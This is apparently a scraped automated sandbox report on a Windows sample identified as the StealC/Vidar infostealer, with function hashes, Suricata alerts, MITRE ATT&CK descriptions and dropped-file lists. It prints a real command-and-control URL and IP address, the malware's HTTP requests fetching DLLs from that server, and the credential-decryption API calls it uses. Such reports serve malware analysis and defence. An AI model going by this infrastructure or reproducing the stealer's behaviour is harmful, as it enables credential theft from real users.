Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 8644ccabdd39f7598f8190600c280acc267cedd63c2cddf56738e80d0d2e0910
Instruction ID: 0bc45efbc56a15fb90265375e450124e3aef0bdf4470a3bdb9cd26a8f81ef013
Opcode Fuzzy Hash: 8644ccabdd39f7598f8190600c280acc267cedd63c2cddf56738e80d0d2e0910
Instruction Fuzzy Hash: 7C31F871A1060A8FDB04CF6CC980AAA73FAFB95304F50413DD41AC7651EF31E95AC794

Function 6C6BB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C660A4D), ref: 6C6BB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C660A4D), ref: 6C6BB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C660A4D), ref: 6C6BB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C660A4D), ref: 6C6BB67F

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: d9d209a4901d0ed02fe7198cde96c2de8e2dc279f2c773b95c5bc01864716047
Instruction ID: 8faa6fbec7cdb6eb0e23bb9a89ffa2cdca4c2045baff36eeb0e7f7c129bded36
Opcode Fuzzy Hash: d9d209a4901d0ed02fe7198cde96c2de8e2dc279f2c773b95c5bc01864716047
Instruction Fuzzy Hash: 1C31D471A012168FDB10CF59C8C469ABBB5FFC5304F168669C846EB201EB31ED25CBA5

Function 6C68F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C68F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C68F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C68F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C68F668

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: fd0c959764e2c6f652b47417bb4cdd4b4b8c15a0ef4d9854fa31841a68e36b3a
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 95316F71B00214AFC714CF1DDCC0A9B7BB5EB94354B148538FA4A8BB04D732E9448BAA

Function 6C6A26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A26C1
free.MOZGLUE(?), ref: 6C6A26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A26FF
free.MOZGLUE ref: 6C6A270D

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d1ae15fc273256de6d2d0fba886dda6b015f370c63a0962ebae03874a0add4ca
Instruction ID: da9dc1a29145f47382f95be9498f80c97c9091a0ac98734626d699cba01f1fb2
Opcode Fuzzy Hash: d1ae15fc273256de6d2d0fba886dda6b015f370c63a0962ebae03874a0add4ca
Instruction Fuzzy Hash: EFF0F9B27012046BE7109E5AD8C4D4773A9EF4131CB100035EA1EC3B11E332FD1AC6AE

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Source: 0.2.file.exe.40000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.40000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00049B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00049B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0004C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00047240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00047240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00049AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00049AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00058EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00058EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGHJJDGHCBGDHIECBGIDAEHCGD

C:\ProgramData\DAKEHIJJKEGIDHIEHDAFIIDBFB

C:\ProgramData\EBAFHCBFHDHCAAKFHDGDBKFCGC

C:\ProgramData\GDHIIIIEHCFIECAKFHJD

C:\ProgramData\HDBKFHIJ

C:\ProgramData\HJJJJKEHCAKFBFHJKEHCFIIDAE

C:\ProgramData\IDBFHJDA

C:\ProgramData\KJECFHCBKKEBAKFIJDHI

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00059860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 000445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0004BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00054910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00044880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00059C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00047710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00050250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre